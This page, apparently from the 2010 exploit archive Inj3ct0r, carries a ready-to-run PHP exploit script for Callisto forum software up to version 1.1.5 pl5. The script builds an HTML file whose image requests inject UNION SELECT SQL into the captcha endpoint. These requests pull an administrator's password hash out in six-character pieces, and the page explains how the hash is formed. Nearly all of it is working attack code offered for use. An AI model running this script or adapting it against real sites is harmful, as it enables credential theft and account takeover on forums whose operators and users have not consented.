Callisto <= 1.1.5 pl5 SQL Injection / Credentials Disclos
Posted on 29 April 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Callisto <= 1.1.5 pl5 SQL Injection / Credentials Disclosure Exploit</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>==================================================================== Callisto <= 1.1.5 pl5 SQL Injection / Credentials Disclosure Exploit ==================================================================== <?php ################################################################################ # Exploit Title: Callisto <= 1.1.5 pl5 SQL Injection / Credentials Disclosure Exploit # # Software Callisto 1.1.5 pl5 # Date: 2010-04-29 # Author: GLOBUS # Software Link: http://www.unisolutions.pl # Version: <= 1.1.5 pl5 # category: SQLi # # Greetz: hds, Neo, pok3, .xXx., j4ck, revel004, Kopaczka ################################################################################ if($argc !== 3) { echo "#------------------------------------------------------------------------- "; echo "# Callisto <= 1.1.5 pl5 SQL Injection / Credentials Disclosure Exploit "; echo "# Author: GLOBUS "; echo "# Greetz: hds, Neo, pok3, .xXx., j4ck, revel004, Kopaczka "; echo "#------------------------------------------------------------------------- "; echo "# php exploit.php [FULL FORUM URL] [ADMIN_ID] # "; echo "# php exploit.php http://www.evil.pl/forum/ 1 # "; echo "#------------------------------------------------------------------------- "; exit; } $path = (substr($argv[1], -1) !== '/' ? $argv[1] .'/' : $argv[1]); $uid = (int) $argv[2]; $fp = fopen(dirname(__FILE__) . '/callisto_exploit.html', 'w'); if(!$fp) { echo "Can't Create File callisto_exploit.html "; exit; } $info = "#-------------------------------------------------------------------------<br /> "; $info .= "# Callisto <= 1.1.5 pl5 SQL Injection / Credentials Disclosure Exploit<br /> "; $info .= "# Author: GLOBUS<br /> "; $info .= "#-------------------------------------------------------------------------<br /><br /> "; $info .= "Hash = <strong>md5(md5($pass).md5($pass));</strong><br />Password <strong>test</strong> => Hash <strong>db2d303c20b9468bbe90114d3d1874b3</strong><br /> Part 1: <strong>db2d30</strong></br /> Part 2: <strong>3c20b9</strong></br /> Part 3: <strong>468bbe</strong></br /> Part 4: <strong>90114d</strong></br /> Part 5: <strong>3d1874</strong></br /> Part 6: <strong>b3</strong></br /></br /><h2>I => 1</h2></br /></br /> "; fwrite($fp, $info); $substr = array(1, 7, 13, 19, 25, 31); $c = 1; foreach($substr as $int) { $save = "Part {$c}: <img src="{$path}index.php?act=captcha&code=1+AND+1=2+UNION+SELECT+SUBSTRING(user_password,{$int},6)+FROM+users+WHERE+user_id={$uid}" /><br /> "; fwrite($fp, $save); $c++; } fclose($fp); echo "Done, run callisto_exploit.html"; ?> # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-04-29]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
